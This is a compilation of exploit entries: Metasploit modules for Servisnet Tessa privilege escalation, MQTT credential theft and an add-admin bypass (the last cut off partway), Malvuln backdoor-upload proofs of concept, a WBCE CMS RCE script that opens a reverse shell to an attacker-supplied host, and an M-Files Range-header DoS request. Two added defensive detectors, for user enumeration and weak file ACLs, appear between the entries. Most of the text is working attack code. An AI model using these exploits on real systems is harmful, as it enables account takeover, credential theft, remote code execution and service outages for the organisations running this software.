<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Servisnet Tessa - Privilege Escalation (Metasploit)',
      'Description' => %q(
        This module exploits a privilege escalation in Servisnet Tessa, triggered by adding a new sysadmin user with any user's authorization.
        An API request to "/data-service/users/[userid]" made by any low-authority user returns other users' information in the response.
        The encrypted password is included there, but privilege escalation is possible with the active sessionid value.

        var token = Buffer.from(`${user.username}:${user.usersessionid}`, 'utf8').toString('base64');

        The logic required for the Authorization header is as above.
        Therefore, after obtaining an authorized user's ID value and active sessionId value,
        encoding the username and sessionId with base64 yields a valid Token, and a new admin user can be added.
      ),
      'References' =>
        [
          [ 'CVE', 'CVE-2022-22832' ],
          [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Privilege-Escalation.html' ],
          [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
        ],
      'Author' =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => "Dec 22 2021",
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL' => true
        }
    ))

    register_options([
      OptString.new('USERNAME', [true, 'Servisnet Username']),
      OptString.new('PASSWORD', [true, 'Servisnet Password']),
      OptString.new('TARGETURI', [true, 'Base path for application', '/'])
    ])
  end

  # extract a value assigned as ["key"] = "value" (app.js style)
  def split(data, string_to_split)
    match = data.match(/"#{string_to_split}"\] = "([\S\s]*?)"/)
    match ? match[1] : ''
  end

  # extract a quoted JSON string value: "key":"value"
  def splitJSON(data, string_to_split)
    match = data.match(/"#{string_to_split}":"([\S\s]*?)"/)
    match ? match[1] : ''
  end

  # extract an unquoted JSON value (number/null): "key":value,
  def splitJSON2(data, string_to_split)
    match = data.match(/"#{string_to_split}":([\S\s]*?),/)
    match ? match[1] : ''
  end

  # read the API base path (baseURL) out of the public app.js; cached after the first fetch
  def app_path
    return @app_path if @app_path

    res = send_request_cgi({
      # default.a.get( check
      'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
      'method' => 'GET'
    })

    match = res && res.code == 200 ? res.body.match(/baseURL: '\/([\S\s]*?)'/) : nil
    fail_with(Failure::NotVulnerable, 'baseURL not found!') unless match

    @app_path = match[1]
  end

  def add_user(token, app_path)
    newuser = Rex::Text.rand_text_alpha_lower(8)
    id = Rex::Text.rand_text_numeric(4)
    # encrypted password hxZ8I33nmy9PZNhYhms/Dg== / 1111111111
    user = {
      'alarm_request' => 1, 'city_id' => nil, 'city_name' => nil, 'decryptPassword' => nil,
      'email' => "#{newuser}@localhost.local", 'id' => id.to_i, 'invisible' => 0, 'isactive' => 1,
      'isblocked' => 0, 'levelstatus' => 1, 'local_authorization' => 1, 'mail_request' => 1,
      'name' => newuser, 'password' => 'hxZ8I33nmy9PZNhYhms/Dg==', 'phone' => nil, 'position' => nil,
      'region_name' => 'test4', 'regional_id' => 0, 'role_id' => 1, 'role_name' => 'Sistem Admin',
      'rolelevel' => 3, 'status' => nil, 'surname' => newuser, 'totalRecords' => nil,
      'try_pass_right' => 0, 'userip' => nil, 'username' => newuser, 'userType' => 'Lokal Kullanıcı'
    }

    res = send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/json',
      'uri' => normalize_uri(target_uri.path, app_path, 'users'),
      'headers' => { 'Authorization' => token },
      'data' => user.to_json
    })

    if res && res.code == 200 && res.body =~ /localhost/
      print_good('The sysAdmin authorized user has been successfully added.')
      print_status("Username: #{newuser}")
      print_status('Password: 1111111111')
    else
      fail_with(Failure::NotVulnerable, 'An error occurred while adding the user. Try again.')
    end
  end

  # the vulnerable app.js builds the token from user.usersessionid
  def sessionid_check
    res = send_request_cgi({
      # user.usersessionid check
      'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /user\.usersessionid/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def find_admin(token, userid, app_path)
    res = send_request_cgi({
      # token check
      'uri' => normalize_uri(target_uri.path, app_path, 'users', userid),
      'headers' => { 'Authorization' => token },
      'method' => 'GET'
    })

    unless res && res.code == 200 && res.body =~ /usersessionid/
      fail_with(Failure::NotVulnerable, 'An error occurred while using the token. Try again.')
    end

    # The admin userid must be less than the low-authority userid.
    (1..userid.to_i).each do |i|
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, app_path, 'users', i.to_s),
        'headers' => { 'Authorization' => token },
        'method' => 'GET'
      })
      next unless res && res.code == 200 && res.body.include?('"Sistem Admin"')

      admin_uname = splitJSON(res.body, 'username')
      admin_sessid = splitJSON(res.body, 'usersessionid')
      admin_userid = splitJSON2(res.body, 'id')
      token_admin = 'Basic ' + Rex::Text.encode_base64("#{admin_uname}:#{admin_sessid}")
      print_good('Excellent! Admin user found.')
      print_good("Admin Username: #{admin_uname}")
      print_good("Admin SessionId: #{admin_sessid}")
      break if session_check(token_admin, admin_userid, admin_uname) == 'OK'
    end
  end

  def session_check(token, userid, user)
    res = send_request_cgi({
      # session check
      'uri' => normalize_uri(target_uri.path, app_path, 'users', userid),
      'headers' => { 'Authorization' => token },
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /managers_codes/
      print_good('Admin session is active.')
      add_user(token, app_path)
      'OK'
    else
      print_status("Admin user #{user} is not online. Try again later.")
      'NOT'
    end
  end

  def login_check(user, pass)
    json_data = { 'username' => user, 'password' => pass }.to_json

    res = send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/json',
      'uri' => normalize_uri(target_uri.path, app_path, 'api', 'auth', 'signin'),
      'data' => json_data
    })

    if res && res.code == 200 && res.body =~ /usersessionid/
      sessid = splitJSON(res.body, 'usersessionid')
      userid = splitJSON2(res.body, 'id')
      print_status("Sessionid: #{sessid}")
      print_status("Userid: #{userid}")
      token = 'Basic ' + Rex::Text.encode_base64("#{user}:#{sessid}")
      print_status("Authorization: #{token}")
      find_admin(token, userid, app_path)
    else
      fail_with(Failure::NotVulnerable, 'An error occurred during login. Try again.')
    end
  end

  def check
    sessionid_check
  end

  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    login_check(datastore['USERNAME'], datastore['PASSWORD'])
  end
end
</code></pre>
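The module above walks user ids on /data-service/users/[userid] with one low-privilege token until it finds an admin record. That access pattern is cheap to spot in web server logs. The detection below is an added example, not part of the module or the vendor's software: it parses constructed combined-log lines and flags any client that successfully reads many distinct user records within a short window (the 60 s window and threshold of 5 are assumed values).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined-log style lines, constructed for this example (not real Tessa logs).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Dec/2021:10:00:01 +0000] "GET /data-service/users/1 HTTP/1.1" 200 612
10.0.0.5 - - [22/Dec/2021:10:00:01 +0000] "GET /data-service/users/2 HTTP/1.1" 200 598
10.0.0.5 - - [22/Dec/2021:10:00:02 +0000] "GET /data-service/users/3 HTTP/1.1" 200 601
10.0.0.5 - - [22/Dec/2021:10:00:02 +0000] "GET /data-service/users/4 HTTP/1.1" 200 590
10.0.0.5 - - [22/Dec/2021:10:00:03 +0000] "GET /data-service/users/5 HTTP/1.1" 200 633
10.0.0.5 - - [22/Dec/2021:10:00:03 +0000] "GET /data-service/users/6 HTTP/1.1" 200 611
10.0.0.5 - - [22/Dec/2021:10:00:04 +0000] "POST /data-service/users HTTP/1.1" 200 512
10.0.0.9 - - [22/Dec/2021:10:00:05 +0000] "GET /data-service/users/42 HTTP/1.1" 200 604
10.0.0.9 - - [22/Dec/2021:10:05:00 +0000] "GET /data-service/users/42 HTTP/1.1" 200 604
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# the per-user endpoint named in the advisory; the base path is an assumption
USER_PATH_RE = re.compile(r"^/data-service/users/(?P<uid>\d+)$")


def parse_user_lookup(line):
    """Return (ip, timestamp, user_id, status) for a GET on /data-service/users/<id>, else None."""
    m = LOG_RE.match(line)
    if not m or m["method"] != "GET":
        return None
    u = USER_PATH_RE.match(m["path"])
    if not u:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, int(u["uid"]), int(m["status"])


def max_distinct_ids_in_window(events, window):
    """events: time-sorted (timestamp, user_id) pairs; largest number of distinct ids in any window."""
    best, start, counts = 0, 0, defaultdict(int)
    for ts, uid in events:
        counts[uid] += 1
        # drop events that fell out of the window
        while ts - events[start][0] > window:
            old = events[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def detect_user_enumeration(log_text, window=timedelta(seconds=60), min_ids=5):
    """Flag clients that successfully read at least `min_ids` distinct user records within `window`."""
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        parsed = parse_user_lookup(line)
        if parsed and parsed[3] == 200:
            ip, ts, uid, _ = parsed
            per_client[ip].append((ts, uid))
    alerts = []
    for ip, events in per_client.items():
        events.sort()
        distinct = max_distinct_ids_in_window(events, window)
        if distinct >= min_ids:
            alerts.append((ip, distinct))
    return alerts


if __name__ == "__main__":
    for ip, n in detect_user_enumeration(SAMPLE_LOG):
        print(f"possible user enumeration from {ip}: {n} distinct user records")
```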
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/99b4428521fa9d9da18e0ccd79e5b985.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Bionet.10
Vulnerability: Authentication Bypass RCE
Description: The malware listens on TCP port 12348. Third-party attackers who can reach infected systems can log on using any username/password combination. Intruders may then upload executables using the FTP PASV and STOR commands, which can result in remote code execution.
Type: PE32
MD5: 99b4428521fa9d9da18e0ccd79e5b985
Vuln ID: MVID-2021-0414
Disclosure: 12/03/2021


Exploit/PoC:
nc64.exe 192.168.18.125 12348
220 BNFTP Server ready.
USER malvuln
331 Password required for malvuln.
PASS malvuln
230 User malvuln logged in.
SYST
215 UNIX Type: L8 Internet Component Suite
CDUP
250 CWD command successful. "C:/" is current directory.
PASV
227 Entering Passive Mode (192,168,18,125,194,182).
STOR DOOM-SM.exe
150 Opening data connection for DOOM-SM.exe.
226 File received ok


import socket

MALWARE_HOST = "192.168.18.125"
PORT = 49846  # data port from the PASV reply above: 194 * 256 + 182
DOOM = "DOOM-SM.exe"


def doit():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))

    # stream the file once, in chunks, over the data connection
    with open(DOOM, "rb") as f:
        chunk = f.read(4096)
        while chunk:
            s.sendall(chunk)
            chunk = f.read(4096)

    s.close()
    print("By Malvuln")


if __name__ == "__main__":
    doit()


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
<pre><code># Exploit Title: WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 02/01/2022
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: 1.5.2
# Tested on: Linux - PHP Version: 8.0.14
# Github repo: https://github.com/WBCE/WBCE_CMS

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import base64
import io
import time

import requests
from bs4 import BeautifulSoup  # pip install beautifulsoup4

# base64-encoded droplet archive (value not reproduced here)
PAYLOAD = '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'


def main():
    parser = argparse.ArgumentParser(description='WBCE <= 1.5.2 - Remote Code Execution (Authenticated)')
    parser.add_argument('-x', '--url', type=str, required=True)
    parser.add_argument('-u', '--user', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    parser.add_argument('-ah', '--attacker_host', type=str, required=True)
    parser.add_argument('-ap', '--attacker_port', type=str, required=True)
    args = parser.parse_args()
    print("\nWBCE 1.5.2 - Remote Code Execution (Authenticated)", "\nExploit Author: Antonio Cuomo (Arkantolo)\n")
    exploit(args, PAYLOAD)


def exploit(args, payload):
    s2 = requests.Session()

    # login
    body = {'url': '', 'username_fieldname': 'username_t18bknev', 'password_fieldname': 'password_t18bknev',
            'username_t18bknev': args.user, 'password_t18bknev': args.password}
    r = s2.post(args.url + '/admin/login/index.php', data=body, allow_redirects=False)
    if r.status_code == 302 and r.headers.get('location', '').find('/start/') != -1:
        print("[*] Login OK")
    else:
        print("[*] Login Failed")
        exit(1)

    time.sleep(1)

    # create droplet
    up = {'userfile': ('t18bknev.zip', io.BytesIO(base64.b64decode(payload)), "multipart/form-data")}
    r = s2.post(args.url + '/admin/admintools/tool.php?tool=droplets&upload=1', files=up)
    if r.status_code == 200 and r.text.find('1 Droplet(s) imported') != -1:
        print("[*] Droplet OK")
    else:
        print("[*] Exploit Failed")
        exit(1)

    time.sleep(1)

    # get csrf token
    r = s2.get(args.url + '/admin/pages/index.php')
    soup = BeautifulSoup(r.text, 'html.parser')
    formtoken = soup.find('input', {'name': 'formtoken'})['value']

    # create page
    body = {'formtoken': formtoken, 'title': 't18bknev', 'type': 'wysiwyg', 'parent': '0',
            'visibility': 'public', 'save': ''}
    r = s2.post(args.url + '/admin/pages/add.php', data=body, allow_redirects=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    try:
        # the page id is taken from the redirect script emitted after the page is created
        page_id = soup.findAll("script")[9].string.split("location.href='")[-1].split("\");")[0].split("'")[0].split("=")[1]
        print("[*] Page OK [" + page_id + "]")
    except Exception:
        print("[*] Exploit Failed")
        exit(1)

    time.sleep(1)

    # get csrf token
    print("[*] Getting token")
    r = s2.get(args.url + '/admin/pages/modify.php?page_id=' + page_id)
    soup = BeautifulSoup(r.text, 'html.parser')
    formtoken = soup.find('input', {'name': 'formtoken'})['value']
    section_id = soup.find('input', {'name': 'section_id'})['value']

    time.sleep(1)

    # add droplet to page
    body = {'page_id': page_id, 'formtoken': formtoken, 'section_id': section_id,
            'content' + section_id: '[[t18bknev]]', 'modify': 'save'}
    r = s2.post(args.url + '/modules/wysiwyg/save.php', data=body, allow_redirects=False)
    if r.status_code == 200 and r.text.find('Page saved') != -1:
        print("[*] Adding droplet OK")
    else:
        print("[*] Exploit Failed")
        exit(1)

    time.sleep(1)

    input("Please make sure that your nc listener is ready...\n\nPRESS ENTER WHEN READY")
    body = {'rev_ip': args.attacker_host, 'rev_port': args.attacker_port}
    r = s2.post(args.url + '/pages/t18bknev.php', data=body, allow_redirects=False)
    if r.status_code == 200:
        print("[*] Exploit OK - check your listener")
        exit(0)
    else:
        print("[*] Exploit Failed")
        exit(1)


if __name__ == '__main__':
    main()
</code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/f529d60abbdafccce3dc5e5ffd6cdfa6.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Vernet.axt
Vulnerability: Insecure Permissions
Description: The malware writes an .EXE with insecure permissions under the c:\ drive, granting change (C) permission to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges.
Type: PE32
MD5: f529d60abbdafccce3dc5e5ffd6cdfa6
Vuln ID: MVID-2021-0413
Disclosure: 12/03/2021


Exploit/PoC:
C:\>cacls chikean.exe
C:\chikean.exe BUILTIN\Administrators:(ID)F
               NT AUTHORITY\SYSTEM:(ID)F
               BUILTIN\Users:(ID)R
               NT AUTHORITY\Authenticated Users:(ID)C


C:\>dir chikean.exe
 Volume in drive C has no label.

 Directory of C:\

06/17/2012  01:43 AM           146,944 chikean.exe
               1 File(s)        146,944 bytes


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
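The cacls listing above is the whole finding: a write-capable ACE for Authenticated Users on an executable in the root of C:\. The parser below is an added example, not Malvuln's code: it reads cacls output of that shape and reports ACEs that give a broad principal (Users, Authenticated Users, Everyone) Full, Change or Write access. It assumes the plain `principal:(flags)right` form shown in the advisory and a path without spaces; "special access" lines are skipped.

```python
import re

# cacls output from the advisory, used here as the sample input
SAMPLE = r"""C:\chikean.exe BUILTIN\Administrators:(ID)F
               NT AUTHORITY\SYSTEM:(ID)F
               BUILTIN\Users:(ID)R
               NT AUTHORITY\Authenticated Users:(ID)C
"""

# principals that mean "any local user"; an ACE for them on an executable is worth a look
WEAK_PRINCIPALS = {"BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users", "Everyone"}
# cacls single-letter rights that allow modifying the file: Full, Change, Write
WRITE_RIGHTS = {"F", "C", "W"}

# "NT AUTHORITY\Authenticated Users:(ID)C" -> principal, optional (flags), right
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<flags>(?:\([A-Z]+\))*)(?P<right>[A-Z]+)$")


def parse_cacls(output):
    """Return a list of (path, principal, right) tuples, one per ACE line in cacls output."""
    entries, path = [], None
    for line in output.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():
            # continuation line: indented ACE for the path from the first line
            ace = line.strip()
        else:
            # first line: path, then the first ACE (path assumed to contain no spaces)
            parts = line.split(None, 1)
            path = parts[0]
            ace = parts[1] if len(parts) > 1 else ""
        m = ACE_RE.match(ace)
        if m is None:
            continue  # e.g. "(special access:)" lines are not handled here
        entries.append((path, m["principal"], m["right"]))
    return entries


def weak_aces(output):
    """ACEs granting a broad principal a write-capable right, the pattern behind MVID-2021-0413."""
    return [
        (path, principal, right)
        for path, principal, right in parse_cacls(output)
        if principal in WEAK_PRINCIPALS and right in WRITE_RIGHTS
    ]


if __name__ == "__main__":
    for path, principal, right in weak_aces(SAMPLE):
        print(f"{path}: {principal} has {right} access")
```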
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/mqtt'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::MQTT
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Servisnet Tessa - MQTT Credentials Dump (Unauthenticated) (Metasploit)',
      'Description' => %q(
        This module exploits an MQTT credentials disclosure in Servisnet Tessa.
        The app.js file, which acts as the backend of the application, is publicly available.
        Because it exposes a default value for the "Authorization" HTTP header,
        it is possible to make unauthenticated requests to some areas of the application.
        Even MQTT (Message Queuing Telemetry Transport) connection information can be obtained this way.
        A new admin user can be added to the database with the header obtained from the source code.

        The module tries to log in to the MQTT service with the credentials it has obtained
        and reports the response it receives from the service.
      ),
      'References' =>
        [
          [ 'CVE', 'CVE-2022-22833' ],
          [ 'URL', 'https://pentest.com.tr/exploits/Servisnet-Tessa-MQTT-Credentials-Dump-Unauthenticated.html' ],
          [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]
        ],
      'Author' =>
        [
          'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
        ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => "Dec 22 2021",
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL' => true
        }
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Base path for application', '/'])
    ])
  end

  # extract a value assigned as ["key"] = "value" (app.js style)
  def split(data, string_to_split)
    match = data.match(/"#{string_to_split}"\] = "([\S\s]*?)"/)
    match ? match[1] : ''
  end

  def check_mqtt
    res = send_request_cgi({
      # connectionMQTT check
      'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
      'method' => 'GET'
    })

    unless res && res.code == 200 && res.body =~ /connectionMQTT/
      fail_with(Failure::NotVulnerable, 'connectionMQTT settings not found in app.js')
    end

    data = res.body
    mqtt_host = data.scan(/host: '([\S\s]*?)'/)[0][0]
    mqtt_rhost = mqtt_host.sub('mqtts://', '')
    print_status("MQTT Host: #{mqtt_host}")
    mqtt_port = data.scan(/port: ([\S\s]*?),/)[0][0]
    print_status("MQTT Port: #{mqtt_port}")
    mqtt_end = data.scan(/endpoint: '([\S\s]*?)'/)[0][0]
    print_status("MQTT Endpoint: #{mqtt_end}")
    mqtt_cl = data.scan(/clientId: '([\S\s]*?)'/)[0][0]
    print_status("MQTT clientId: #{mqtt_cl}")
    # the MQTT username/password are the second username:/password: pairs in app.js
    mqtt_usr = data.scan(/username: '([\S\s]*?)'/)[1][0]
    print_status("MQTT username: #{mqtt_usr}")
    mqtt_pass = data.scan(/password: '([\S\s]*?)'/)[1][0]
    print_status("MQTT password: #{mqtt_pass}")

    print_status('##### Starting MQTT login sweep #####')

    # Only the credentials recovered from app.js are tried; brute force word lists are not included.
    cred_collection = Metasploit::Framework::CredentialCollection.new(
      password: mqtt_pass,
      username: mqtt_usr
    )
    # this definition already exists in "auxiliary/scanner/mqtt/connect". Moved into exploit.
    cred_collection = prepend_db_passwords(cred_collection)

    scanner = Metasploit::Framework::LoginScanner::MQTT.new(
      host: mqtt_rhost,
      port: mqtt_port.to_i,
      read_timeout: datastore['READ_TIMEOUT'],
      client_id: client_id,
      proxies: datastore['PROXIES'],
      cred_details: cred_collection,
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: datastore['ConnectTimeout'],
      max_send_size: datastore['TCP::max_send_size'],
      send_delay: datastore['TCP::send_delay'],
      framework: framework,
      framework_module: self,
      ssl: datastore['SSL'],
      ssl_version: datastore['SSLVersion'],
      ssl_verify_mode: datastore['SSLVerifyMode'],
      ssl_cipher: datastore['SSLCipher'],
      local_port: datastore['CPORT'],
      local_host: datastore['CHOST']
    )

    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
        module_fullname: fullname,
        workspace_id: myworkspace_id
      )
      password = result.credential.private
      username = result.credential.public
      if result.success?
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
        create_credential_login(credential_data)
        print_good("MQTT Login Successful: #{username}/#{password}")
      else
        invalidate_login(credential_data)
        vprint_error("MQTT LOGIN FAILED: #{username}/#{password} (#{result.proof})")
      end
    end
  end

  # the default Authorization header is hardcoded in app.js
  def auth_bypass
    res = send_request_cgi({
      # default.a.defaults.headers.post["Authorization"] check
      'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),
      'method' => 'GET'
    })

    if res && res.code == 200 && res.body =~ /default\.a\.defaults\.headers\.post/
      token = split(res.body, 'Authorization')
      print_status("Authorization: #{token}")
      token
    else
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
  end

  def check
    if auth_bypass =~ /Basic/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def run
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    check_mqtt
  end
end
</code></pre>
<pre><code>I. SUMMARY
=============================================================================================================================================================
Title: M-Files Web Improper Range Header Processing Denial of Service (DoS) Vulnerability
Product: M-Files Web version before 20.10.9524.1, M-Files Web version before 20.10.9445.0
Vulnerability Type(s): Denial of Service (DoS)
Credit by/Researcher: Murat Aydemir (Turkey)
Contact: https://twitter.com/mrtydmr75
Github: https://github.com/murataydemir
=============================================================================================================================================================

II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES
=============================================================================================================================================================
CVE Number: CVE-2021-37253
CVSSv3 Score: 4.3
CVSSv3 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L (score 4.3)
Severity: Medium
Confidentiality Impact: None (There is no impact to the confidentiality of the system)
Integrity Impact: None (There is no impact to the integrity of the system)
Availability Impact: Complete (There is a total shutdown of the affected resource. The attacker can render the resource completely unavailable)
Access Complexity: Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit)
Authentication: Not required (Authentication is not required to exploit the vulnerability)
Gained Access: None
Vulnerability Type(s): Denial of Service (DoS)
CWE ID: CWE-399 Resource Management Errors (https://cwe.mitre.org/data/definitions/399.html)
=============================================================================================================================================================

III. TIMELINE
=============================================================================================================================================================
Contact to Vendor: the 24th of August, 2020
Vendor (M-Files) Reply: the 3rd of November, 2020 (rejected vulnerability)
Contact to Vendor: the 4th of November, 2020 (provided additional information and some proofs of concept)
Vendor (M-Files) Reply: the 6th of November, 2020 (accepted vulnerability and asked for time to fix)
Vendor (M-Files) Reply: the 4th of August, 2021 (informed me that "we're accepting this vulnerability but we'll not give an effort to fix that and also will not apply any CVE for this vuln.")
Contact to MITRE: the 4th of August, 2021 (contacted MITRE and applied for a CVE. MITRE has reserved a CVE for this vulnerability)
=============================================================================================================================================================

IV. DESCRIPTION & MITIGATION
=============================================================================================================================================================
M-Files Web version before 20.10.9524.1 and M-Files Web version before 20.10.9445.0 contain an Improper Range Header Processing Vulnerability. A remote unauthenticated attacker may send crafted requests with overlapping ranges (via HTTP requests with specially crafted Range or Request-Range headers) to cause the web application to compress each of the requested byte ranges, resulting in a crash due to excessive memory and CPU consumption and preventing users from accessing the system.

Even though this vulnerability (CVE-2021-37253) has been verified and accepted by the Vendor (M-Files), their security team also contacted me and informed me that no effort will be given to fixing this vulnerability. Thus, there is no active patch, update or mitigation plan for the CVE-2021-37253 vulnerability. The following do not exactly fix the problem (they are remediations at best), but I strongly recommend that you restrict which client IP addresses may send requests to the web application, or reconfigure the web server's "Byte-range Request Segment Size", as soon as possible.
=============================================================================================================================================================

V. PROOF OF CONCEPT (POC) FOR CVE-2021-37253
=============================================================================================================================================================
This vulnerability is easy to detect and exploit. Just find a static content file (such as .png, .jpg, .jpeg, .js, .css and so on) and make a request as follows.

GET /Icons/Standard/Listing/VaultMounting.png HTTP/1.1
Host: <host>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Range: bytes=0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-,0-

Note: this issue is valid and easily reproducible for all static assets (which have .png, .jpg, .jpeg, .js, .css, .gif extensions and so on).
=============================================================================================================================================================

VI. REFERENCE(S)
=============================================================================================================================================================
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37253
https://nvd.nist.gov/vuln/detail/CVE-2021-37253
=============================================================================================================================================================
</code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Servisnet Tessa - Add sysAdmin User (Unauthenticated) (Metasploit)',<br /> 'Description' => %q(<br /> This module exploits an authentication bypass in Servisnet Tessa to add a new sysadmin user.<br /> The client-side bundle js/app.js is served without authentication and hard-codes a default value<br /> for the "Authorization" HTTP header that the application's HTTP client attaches to its POST requests.<br /> Replaying that header makes unauthenticated requests to parts of the backend API possible;<br /> even the MQTT (Message Queuing Telemetry Transport) connection information can be obtained this way.<br /> The module reads the header from app.js and uses it to add a user with the "Sistem Admin" role to the database.<br /> ),<br /> 'References' =><br /> [<br /> [ 'CVE', 'CVE-2022-22831' ],<br /> [ 'URL', 'https://www.pentest.com.tr/exploits/Servisnet-Tessa-Add-sysAdmin-User-Unauthenticated.html' ],<br /> [ 'URL', 'http://www.servisnet.com.tr/en/page/products' ]<br /> ],<br /> 'Author' =><br /> [<br /> 'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => "Dec 22 2021",<br /> 'DefaultOptions' =><br /> {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> }<br /> ))<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path for application', '/'])<br /> ])<br /> end<br />
